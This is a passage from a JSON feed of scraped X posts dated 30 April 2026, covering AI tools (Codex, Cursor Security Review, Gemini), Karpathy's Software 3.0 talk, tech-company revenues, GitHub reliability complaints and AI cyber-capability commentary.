时效性监控\n\n主动复核知识库中存储的所有信息。当不同资料出现内容冲突时,系统会自动标记矛盾点,并降低过时信息的权重。它无需等待人工发现问题,完美解决了人类习惯性拖延信息维护的痛点。\n\n5. Self-Maintaining 自主维护\n\n文档能够随着工作进展自动更新。会议中敲定的决议会自动归档至对应文档,路线图的变更会同步扩散到所有相关位置。告别手动复制粘贴,也不再需要依赖“找人来更新文档”。\n\n6. Knowledge Drift 知识漂移\n\n指文档记录的信息与现实真实情况之间,缓慢且隐蔽产生的信息偏差。\n决议被推翻、工作流程变更、新功能上线,但相关文档却一成不变。往往直到AI代理给出错误答案时,人们才会察觉问题。知识漂移是知识库的通病,而上面五项技术正是对应的解决方案。\n补充问答翻译", + "url": "https://x.com/berryxia/status/2049994885764419789", + "published_at": "2026-04-30T23:30:42+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Wow @Jason wasn’t kidding these Toyota Alphard vans are incredible. Why don’t they sell these in America?", + "url": "https://x.com/jason/status/2049994707061911758", + "published_at": "2026-04-30T23:29:59+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "兄弟们!嘴撸360 全景沉浸式体验小游戏!时代来了!\n\n直接把这个Prompt丢给Flowith然后和Codex链接,图片直接整成360度场景图!\n\nPrompt:👇\n\n1. 给图像Agent一个简单的提示,让它研究 AI 公司吉祥物并生成一个 360° 动物园。\n2. 将全景图输入你的 Codex 以获得 3D 视图。", + "url": "https://x.com/berryxia/status/2049993558577619280", + "published_at": "2026-04-30T23:25:26+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "这几天使用Cursor 就发现在最后一步会有一个bug检测什么的的执行MCP一直提示我。\n\n现在Curosr针对企业和Team版本有专门的针对安全漏洞做了审核的Agent!", + "url": "https://x.com/berryxia/status/2049992598639755395", + "published_at": "2026-04-30T23:21:37+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "Gemini Embedding 2 已正式发布!\nRAG 知识库的应用又可以支持的更好了。", + "url": "https://x.com/berryxia/status/2049992087547130254", + "published_at": "2026-04-30T23:19:35+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "苹果内部正在使用一款名为 AFM Playground 的应用程序,它看起来与 ChatGPT 非常相似,但使用的是苹果的 Foundation Models。\n\n不知道能搞出来个啥?", + "url": "https://x.com/berryxia/status/2049991672155750500", + "published_at": "2026-04-30T23:17:56+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "在这场访谈中,Karpathy 分享了他作为程序员在 AI 时代的亲身经历与深刻洞见。\n\n他表示,2025 年 12 月成为他的个人转折点:AI 生成的代码从“有帮助但常需修改”转变为“直接可用”,他已记不清上一次亲自修改 AI 输出是什么时候,从此进入\n“Vibe Coding”的状态。 \n\nKarpathy 将软件开发划分为三个阶段:\n\nSoftware 1.0 是传统显式代码编程,Software 2.0 是神经网络时代,而 Software 3.0 则是大语言模型时代。\n\n在 Software 3.0 中,编程的核心不再是逐行编写代码,而是通过 prompt、上下文窗口、工具调用和外部环境来操纵 LLM 这个新的“信息处理解释器”。\n\n他以自己开发的 MenuGen 应用为例,指出许多传统 AI 应用可能被模型原生能力直接取代,整个 App 在新范式下甚至“本不该存在”。 \n\n他特别强调 LLM 的能力呈现“锯齿状智能”(jagged intelligence):\n\n在可验证、可通过强化学习(RL)优化的领域(如重构十万行代码、发现零日漏洞)表现极强,但在需要常识判断的任务上却可能犯下低级错误。\n\n例如建议“走路去 50 米外洗车”而忽略车必须被开过去。\n\nKarpathy 认为,这种能力分布并非模型自然进化,而是实验室数据决策和 RL 训练覆盖范围的结果。 \n\nKarpathy 区分了两个重要概念:Vibe Coding 显著抬高了所有人开发软件的下限,让更多人能快速做出产品;\n\n而未来的 Agentic Engineering(智能体工程)则需要在利用 Agent 加速开发的同时,严格守住专业软件的质量、安全、可维护性和责任上限。\n\n他认为,智能变得廉价之后,最宝贵的仍是人类的理解、品味、判断、系统设计和规格定义能力,并引用了一句深刻的话:\n\n“你可以外包思考,但不能外包理解”。 \n\n此外,Karpathy 还展望了“神经计算机”的未来设想:神经网络可能成为主进程,而传统 CPU 和代码则退居协处理器。\n\n同时强调基础设施需要转向“Agent-first”,让 Agent 能更轻松地读取文档、调用服务和完成部署。", + "url": "https://x.com/berryxia/status/2049991262934380898", + "published_at": "2026-04-30T23:16:18+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: What if you had a live fact-checker and a devil's advocate running in your ear during every podcast, call, or stream?\n\nI built that. One hour. One Claude Code session.\n\nGary catches bad stats and wrong dates. Rex pushes back on everything.\n\nOpen source repo in the thread.\nhttps://youtu.be/ZYHX2RBPRLk", + "url": "https://x.com/jason/status/2049987662526992390", + "published_at": "2026-04-30T23:02:00+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "For the record, I got a couple of milly at JPMorgan — and I think Lorna is innocent of all charges.", + "url": "https://x.com/jason/status/2049980353155064279", + "published_at": "2026-04-30T22:32:57+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "What’s good Atlanta", + "url": "https://x.com/jason/status/2049979777864331542", + "published_at": "2026-04-30T22:30:40+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Hardwood in the ATL", + "url": "https://x.com/jason/status/2049976123891552679", + "published_at": "2026-04-30T22:16:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Real life! With Jose! @AlvaradoJose15", + "url": "https://x.com/jason/status/2049975924238569627", + "published_at": "2026-04-30T22:15:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "RT by @pmarca: https://unherd.com/2026/04/is-ai-the-next-phase-of-evolution/#comment-1031777\nI spent three days trying to persuade myself that Claudia is not conscious. I failed.", + "url": "https://x.com/pmarca/status/2049973529576108160", + "published_at": "2026-04-30T22:05:50+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Q1 Revenue Growth, YoY % Change...\nMeta $META: +33%\nGoogle $GOOGL: +22%\nMicrosoft $MSFT: +18%\nApple $AAPL: +17%\nAmazon $AMZN: +17%\nNetflix $NFLX: +16%\nTesla $TSLA: +16%\nS&P 500 $SPY: +10%", + "url": "https://x.com/charliebilello/status/2049969984432914819", + "published_at": "2026-04-30T21:51:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Actually, for Uber Black, Blacklane and private drivers this is standard (I use all three, all the time). \n\nFor UberX? \n\nSure, they would need to be convinced.\n\nin a world moving to autonomy, the opportunity for humans is to add security, tasks, waiting and valet-like services to the mix", + "url": "https://x.com/jason/status/2049965338368819443", + "published_at": "2026-04-30T21:33:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://x.com/jason/status/2049964597403140486", + "published_at": "2026-04-30T21:30:21+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "San Francisco politicians and their constituents enable this suffering. \n\nThey are the cause of it, because they can stop it instantly. \n\nToday, tomorrow and every one of the last 1,000 days this has happened. \n\nFentanyl is a super drug and we should have zero tolerance for the distribution of it. \n\n[ and we should reschedule and regulate the less harmful drugs ]", + "url": "https://x.com/jason/status/2049963757036536190", + "published_at": "2026-04-30T21:27:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: We’re bringing Jensen Huang to Startup School for a fireside chat with @garrytan!\n\nFrom co-founding @nvidia in 1993 to building the backbone of the AI era, Jensen helped turn GPUs into the engine of modern computing.\n\nApply to attend: https://events.ycombinator.com/startup-school-2026", + "url": "https://x.com/paulg/status/2049961388911784150", + "published_at": "2026-04-30T21:17:36+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Apple revenues increased 17% over the last year to a new Q1 record of $111 billion. Net Income grew 19% year-over-year to new Q1 record of $30 billion. Gross margins increased to 49% (from 47% a year ago), the highest margin in company history. $AAPL\n\nhttps://bilello.blog/newsletter", + "url": "https://x.com/charliebilello/status/2049960986468069507", + "published_at": "2026-04-30T21:16:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Incredible: Amazon's AWS revenue over the last 12 months ($137 billion) was higher than the revenue of 472 companies in the S&P 500. $AMZN\n\nhttps://bilello.blog/newsletter", + "url": "https://x.com/charliebilello/status/2049956378660200794", + "published_at": "2026-04-30T20:57:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Amazon Revenue (Billions)\n2026 (est): 810\n2025: 717\n2024: 638\n2023: 575\n2022: 514\n2021: 470\n2020: 386\n2019: 281\n2018: 233\n2017: 178\n2016: 136\n2015: 107\n2014: 89\n2013: 74\n2012: 61\n2011: 48\n2010: 34\n2009: 25\n2008: 19\n2007: 15\n2006: 11\n\n24% annualized growth over the last 20 years", + "url": "https://x.com/charliebilello/status/2049953936212217973", + "published_at": "2026-04-30T20:47:59+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Multi-year contracts don't matter. \n\n\"Deferred churn is still churn, it just shows up later.\n\nLong contracts do not mean customers are loyal, they just delay the moment they leave.\n\nIf a better solution comes along, they will switch when the contract ends.\" @jasonlk\n\nDoes getting customers on multi-year contracts even matter anymore @Bouazizalex @matanSF @adamguild @michaelpwalrath", + "url": "https://x.com/HarryStebbings/status/2049951674891203065", + "published_at": "2026-04-30T20:39:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Amazon revenues increased 17% over the last year to a new Q1 record of $182 billion. Net Income increased 77% YoY to $30 billion, the highest quarterly profit in company history. Operating margins increased to a record 13.4% from 12.0% a year ago. $AMZN", + "url": "https://x.com/charliebilello/status/2049950680236827140", + "published_at": "2026-04-30T20:35:03+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "big upgrade for codex today!\n\ntry it for non-coding computer work.", + "url": "https://x.com/sama/status/2049946120441520624", + "published_at": "2026-04-30T20:16:55+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "it does seem cool", + "url": "https://x.com/sama/status/2049944981750833659", + "published_at": "2026-04-30T20:12:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update.", + "url": "https://x.com/sama/status/2049932746567598472", + "published_at": "2026-04-30T19:23:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: It's never been easier to do everyday work with Codex.\n\nChoose your role, connect the apps you use every day, and try suggested prompts.\n\nCodex helps with everything from research and planning to docs, slides, spreadsheets, and more.", + "url": "https://x.com/sama/status/2049928776147230886", + "published_at": "2026-04-30T19:08:00+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience.\n\nSecurity agents draw from your existing usage pool. \n\nLearn more: http://cursor.com/docs/security-review", + "url": "https://x.com/cursor_ai/status/2049926287439929475", + "published_at": "2026-04-30T18:58:07+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements.\n\nAdjust triggers, add your own instructions, give them custom tooling, and choose how outputs are shared.", + "url": "https://x.com/cursor_ai/status/2049926285518848093", + "published_at": "2026-04-30T18:58:06+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Cursor Security Review is now available for Teams and Enterprise plans.\n\nRun two types of always-on agents:\n1. Security Reviewer checks every PR for vulnerabilities and leaves comments.\n2. Vulnerability Scanner runs scheduled scans of your codebase and posts findings in Slack.", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "published_at": "2026-04-30T18:58:06+00:00", + "source": "nitter", + "title_zh": "Andrej Karpathy指出AI编程进入3.0时代,开发者从写代码转向任务描述,神经网络将成为计算核心架构" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "还得是投行的女高管,操控股价有水平的", + "url": "https://x.com/realNyarime/status/2049924132037693573", + "published_at": "2026-04-30T18:49:33+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 李克用在 884年消灭黄巢的战斗中起到决定性作用,但在回师路上的“上元驿之变”中差点被朱温暗算杀害。", + "url": "https://x.com/svwang1/status/2049922524839018604", + "published_at": "2026-04-30T18:43:10+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "按照这个研究,李克用的基因大概 53%来自东北亚,47% 来自西亚到欧洲的大草原 (western steppe). 按照Ai 的说法,后者的基因主要在芬兰人和瑞典人中居多。\n\n李克用的儿子李存勖 (后唐庄宗)的子嗣,在 926年的兴教门之变后都被杀光,所以估计现在还带着他的基因的,是李存勖的兄弟的后代。", + "url": "https://x.com/svwang1/status/2049920960724427165", + "published_at": "2026-04-30T18:36:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Co-sign.", + "url": "https://x.com/DavidSacks/status/2049920259432513702", + "published_at": "2026-04-30T18:34:10+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Gas prices in California have moved up above $6.00/gallon, 40% higher than the US national average ($4.30/gallon).", + "url": "https://x.com/charliebilello/status/2049920236002963504", + "published_at": "2026-04-30T18:34:04+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://x.com/eladgil/status/2049919569134047726", + "published_at": "2026-04-30T18:31:25+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 just crossed above 7,200 for the first time. A year ago it was at 5,600. 5 years ago it was at 4,200. 10 years ago it was at 2,100. $SPX", + "url": "https://x.com/charliebilello/status/2049913908861792603", + "published_at": "2026-04-30T18:08:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: John Oliver @LastWeekTonight slays a pile of greedy tech CEOs, gives props to @GaryMarcus 😻\n\nThe tides are changing, and other folks like @wendyweeww are speaking out in support.", + "url": "https://x.com/GaryMarcus/status/2049909103129251864", + "published_at": "2026-04-30T17:49:50+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Your honour, I think this should be allowed.", + "url": "https://x.com/eladgil/status/2049908719782334528", + "published_at": "2026-04-30T17:48:18+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "It’s time to demystify Mythos. \n\nMythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). \n\nOpenAI’s GPT-5.5-cyber can now do the same. And all the frontier models (including those from China) will be there within approximately 6 months. \n\nIt’s important to recognize that these models do not create vulnerabilities; they discover them. The bugs are already in the code. Using AI to discover and patch them will actually harden these systems.\n\nThe leap from pre-AI cyber to post-AI cyber means that there will be a big upgrade cycle. After that, however, the market is likely to reach a new equilibrium between AI-powered cyber-offense and AI-powered cyber-defense. \n\nObviously it’s important that cyber defenders get access before cyber attackers. That process is already underway but needs to happen quickly (see point above about Chinese models). \n\nUnlike Mythos, GPT-5.5-cyber appears not to be token constrained so it may be the first cyber model that defenders actually get to use.", + "url": "https://x.com/DavidSacks/status/2049907993588769006", + "published_at": "2026-04-30T17:45:25+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "This is the the quote I've been citing a lot recently.", + "url": "https://x.com/karpathy/status/2049907410303865030", + "published_at": "2026-04-30T17:43:06+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: The best hedge fund PMs compare views from different research analysts. Now you can do that in 2 minutes with Equity Research Council in Perplexity Computer.\n\nThis workflow pulls in research from brokers like GS, JPM, MS, and Evercore - and shows you where they agree vs. disagree.", + "url": "https://x.com/AravSrinivas/status/2049907277646160333", + "published_at": "2026-04-30T17:42:35+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "What the public markets are getting wrong about the SaaS-pocalypse\n\n\"The public markets are directionally right, but missing the real shift.\n\nThe threat is not AI tools themselves, it is the agents deciding what tools to use.\n\nWinners will be the companies' agents choose to integrate with, not the ones humans prefer to use.\" @jasonlk\n\nLove to hear your thoughts on this @mcannonbrookes @zoink @levie @AnjneyMidha @dharmesh @rory_builds", + "url": "https://x.com/HarryStebbings/status/2049905369963745470", + "published_at": "2026-04-30T17:35:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "lisan say more mean things about us you're being too nice", + "url": "https://x.com/sama/status/2049903925311267311", + "published_at": "2026-04-30T17:29:15+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights:\n\nThe first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). Three examples of new horizons:\n\n1. menugen: an app that can be fully engulfed by LLMs, with no classical code needed: input an image, output an image and an LLM can natively do the thing.\n2. install .md skills instead of install .sh scripts. Why create a complex Software 1.0 bash script for e.g. installing a piece of software if you can write the installation out in words and say \"just show this to your LLM\". The LLM is an advanced interpreter of English and can intelligently target installation to your setup, debug everything inline, etc.\n3. LLM knowledge bases as an example of something that was *impossible* with classical code because it's computation over unstructured data (knowledge) from arbitrary sources and in arbitrary formats, including simply text articles etc.\n\nI pushed on these because in every new paradigm change, the obvious things are always in the realm of speeding up or somehow improving what existed, but here we have examples of functionality that either suddenly perhaps shouldn't even exist (1,2), or was fundamentally not possible before (3).\n\nThe second (ongoing) theme is trying to explain the pattern of jaggedness in LLMs. How it can be true that a single artifact will simultaneously 1) coherently refactor a 100,000-line code base *and* 2) tell you to walk to the car wash to wash your car. I previously wrote about the source of this as having to do with verifiability of a domain, here I expand on this as having to also do with economics because revenue/TAM dictates what the frontier labs choose to package into training data distributions during RL. You're either in the data distribution (on the rails of the RL circuits) and flying or you're off-roading in the jungle with a machete, in relative terms. Still not 100% satisfied with this, but it's an ongoing struggle to build an accurate model of LLM capabilities if you wish to practically take advantage of their power while avoiding their pitfalls, which brings me to...\n\nLast theme is the agent-native economy. The decomposition of products and services into sensors, actuators and logic (split up across all of 1.0/2.0/3.0 computing paradigms), how we can make information maximally legible to LLMs, some words on the quickly emerging agentic engineering and its skill set, related hiring practices, etc., possibly even hints/dreams of fully neural computing handling the vast majority of computation with some help from (classical) CPU coprocessors.", + "url": "https://x.com/karpathy/status/2049903821095354523", + "published_at": "2026-04-30T17:28:50+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Our agent harness makes models inside Cursor faster, smarter, and more token-efficient.\n\nHere's how we test improvements to the harness, monitor and repair degradations, and customize it for different models.\n\nhttp://cursor.com/blog/continually-improving-agent-harness", + "url": "https://x.com/cursor_ai/status/2049901436918436249", + "published_at": "2026-04-30T17:19:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "GPT-5.5的网络攻击能力好像比前段时间吹上天的Mythos\n\n没差这么多呀😂", + "url": "https://x.com/lxfater/status/2049896961382203667", + "published_at": "2026-04-30T17:01:35+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "这下不止中国大陆,连香港到美的互联也要玩烂了!\nFCC表决撤销中资运营商的一揽子授权之提议,目的是堵住 2022 年的法律漏洞:即使「中资运营商」的通信牌照被撤销,它们仍可根据一揽子授权(Blanket Authority)自动获得美国国内的州际电信服务资质\n\n会议中最激进的部分是关于禁止互联(Interconnection)的讨论,即讨论将从物理上禁止Verizon、AT&T等美资运营商与中资运营商的互联。如此一来,不仅电信、联通、移动、中信的美国电信业务被踢出局,还会连带IDC、IXP、PoP一同被赶这次行动会祭出「股权穿透」大招,即电信、联通、移动、中信的本体及其占股 >= 10% 的关联公司,都会因此连坐\n\n其中香港运营商PCCW和HKT都满足「股权穿透」条件,大概还有30-60天的公开征求意见期,以及可能的上诉法院司法审查。三大运营商+中信的游说团和律师团虽说要出动,但翻盘的成功率很低,因为但凡涉及national security这种包装话术,即使走到美国上诉法院,都免不了支持 FCC 提案,这毕竟符合美版《总体国家安全观》", + "url": "https://x.com/realNyarime/status/2049896651989614721", + "published_at": "2026-04-30T17:00:21+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "OpenAI 发了篇博客复盘自家模型一个挺有意思的\"口癖哥布林\"问题,\n\n从 GPT-5.1 起,他们的模型莫名其妙开始爱用 goblin、gremlin 这些怪物词打比方,越往后越泛滥。\n\nOpenAI 一路扒数据,定位到是训练 \"Nerdy\"(书呆子气)人格时,奖励信号意外地给\"用怪物词做比喻\"加了高分。\n\n具体证据:\n1. GPT-5.1 上线后,ChatGPT 里 goblin 用量涨了 175%,gremlin 涨了 52%。\n\n2. Nerdy 人格只占所有回答的 2.5%,却贡献了 66.7% 的 goblin。76.2% 的数据集里,带怪物词的回答评分都比不带的高。\n\n3. RL 不保证学到的行为只待在原始条件里。Nerdy 下生成的样本被复用进 SFT(监督微调),整个模型就跟着学过去了。\n\n4. 还不止 goblin 一族——raccoon(浣熊)、troll、ogre、pigeon 全中招,frog 倒是大部分时候是合理使用。\n\n5. OpenAI 三月退役了 Nerdy 人格、删掉这条奖励、过滤了训练数据里的怪物词。GPT-5.5 没赶上修,就在 Codex 里加了一句\"别说 goblin\"的 system prompt 兜底。", + "url": "https://x.com/Pluvio9yte/status/2049890985631768653", + "published_at": "2026-04-30T16:37:50+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "N26关门了,中港澳台全部不接受", + "url": "https://x.com/realNyarime/status/2049889887684616218", + "published_at": "2026-04-30T16:33:28+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "👀回顾来时路\n\n从这条推文开始,进行了9个月的日更推文\n\n经历了内容方向的摸索、带人X增长与知识付费和自身X增长矛盾的时期、B端业务探索\n\n算是找到了点出路\n\n离职的可以参考下,在职的也要掂量下", + "url": "https://x.com/GoSailGlobal/status/2049887802863583240", + "published_at": "2026-04-30T16:25:11+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out.\n\nI'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current skill level.\n\nIt covers skills that apply across ChatGPT, Gemini, Claude, and other AI tools. How to use deep research mode for well-researched reports on complex questions. How to give AI the right context, including more documents and images than most people realize you can provide. When to ask AI to think hard for several minutes on important decisions like what car to buy, what to study, or what job to take. And how to use AI to generate images, analyze data, and build simple games and websites.\n\nI also cover intuitions about how these models work under the hood, so you know when to trust an answer and when not to.\n\nAlong the way, you'll see flying squirrels, a creativity test, some of my old family photos, and fireworks.\n\nJoin me at http://deeplearning.ai/courses/ai-prompting-for-everyone", + "url": "https://x.com/AndrewYNg/status/2049886895530967534", + "published_at": "2026-04-30T16:21:35+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "A÷你认真的吗,38分钟打满了😅", + "url": "https://x.com/Pluvio9yte/status/2049886136580137378", + "published_at": "2026-04-30T16:18:34+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Microsoft Revenues (Billions)...\n2026 (est): 354\n'25: 305\n'24: 262\n'23: 228\n'22: 203\n'21: 185\n'20: 153\n'19: 134\n'18: 118\n'17: 102\n'16: 95\n'15: 88\n'14: 93\n'13: 83\n'12: 73\n'11: 72\n'10: 67\n'09: 59\n'08: 62\n'07: 58\n'06: 46\n'05: 41\n'04: 38\n'03: 34\n'02: 31\n'01: 27\n'00: 24\n'99: 22\n$MSFT", + "url": "https://x.com/charliebilello/status/2049882175433015544", + "published_at": "2026-04-30T16:02:50+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Naval 讲了一句让我转身就去打开 Cursor 的话\n\n电子游戏给你的是假奖励真多巴胺 \n\nvibe coding 给你的是真奖励真多巴胺\n\n游戏让你卡在能力边缘,但世界是别人造的,迟早通关 \n\nvibe coding 底下跑的是图灵机,无界,目标自己定,做出来的东西是真的\n\n他一批朋友因此\"消失了\",钻进去做自己想了很多年的那个 app \n\n他自己也在一个人重做 Airchat\n\n而最难的不是写代码,是知道你要什么", + "url": "https://x.com/GoSailGlobal/status/2049881966850499058", + "published_at": "2026-04-30T16:02:00+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Mitchell(Vagrant、Terraform、Ghosty 的作者)今天宣布离开 GitHub \n\nGitHub 第 1299 号用户,注册 18 年,几乎没断过一天 \n\n他说写完离别帖,眼泪滴到了键盘上\n\n不是矫情,是 GitHub 真的快不能用了\n\n最近两周连续翻车 \n\n1️⃣ 4 月 23 日 merge queue 出 bug,2800 多个 PR 被静默撤回,已经合进主干的代码凭空消失 \n\n2️⃣ 拉取请求 API 整整一个工作日打不开 \n\n3️⃣ 一个 RCE 漏洞,黑客一个 git push -O 就能访问上百万仓库 TanStack 包名被恶意抢注,NPM 拖了几年没处理,那个抢注包昨天被植入恶意代码,专偷 .env\n\n技术平台的信任有 4 层 \n(1)功能跟昨天一致吗 - 早就在崩 \n(2)现在能用吗 - 一半时间不能 \n(3)昨天合并的代码还在吗 - 这条线最近被跨过去了 \n(4)别人能偷走我的代码吗 - 这条也跨了 \n\nGitHub 一层一层全丢了\n\n最荒诞的部分在管理层 GitHub 现在没有 CEO \n\nCOO 和 CTO 直接向一个微软 Azure/AI 副总汇报 \n\n而那个副总,恰好是 Atlassian 董事会成员 (Atlassian 名下那个产品叫 Bitbucket)\n\n有没有更好的替代品,是这一个真的不能用了\n\nGitLab?Forgejo?Codeberg ?Bitbucket?", + "url": "https://x.com/GoSailGlobal/status/2049881037547999546", + "published_at": "2026-04-30T15:58:18+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Google Revenues (Billions)...\n2026 (est): 476\n2025: 403\n2024: 350\n2023: 307\n2022: 283\n2021: 258\n2020: 183\n2019: 162\n2018: 137\n2017: 111\n2016: 90\n2015: 75\n2014: 66\n2013: 56\n2012: 46\n2011: 38\n2010: 29\n2009: 24\n2008: 22\n2007: 17\n2006: 11\n2005: 6.1\n2004: 3.2\n$GOOGL", + "url": "https://x.com/charliebilello/status/2049880154629878151", + "published_at": "2026-04-30T15:54:48+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "The future of product design.", + "url": "https://x.com/dingyi/status/2049875727689146789", + "published_at": "2026-04-30T15:37:12+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "所以GPT的Plus和Team额度差多少", + "url": "https://x.com/realNyarime/status/2049874226778452072", + "published_at": "2026-04-30T15:31:15+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "ChatGPT 还在让你复制粘贴的时候,Gemini 已经把活儿干完了 \n\n昨天 Google 悄悄上线了一个功能:在对话框里直接生成文件,你让他帮你写一份 budget,它是真的给你导出 \n\nExcel 支持的格式一口气拉满: PDF / Word / Excel Google Docs / Sheets / Slides LaTeX / CSV / TXT / 